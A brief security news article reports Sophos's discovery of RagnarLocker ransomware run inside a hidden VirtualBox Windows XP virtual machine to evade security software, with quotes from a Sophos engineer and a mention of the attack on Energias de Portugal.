Security researchers are warning of a new ransomware attack technique which deploys the malware as a virtual machine (VM) in order to evade traditional defenses.
Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.
It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.
“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.
The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.
“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.
The attack appears to have been highly targeted, as the ransom note contained the victim’s name.
RagnarLocker has been in action recently, after it was deployed against Portuguese energy giant Energias de Portugal (EDP) group in an attack demanding a payment of €10m ($11m).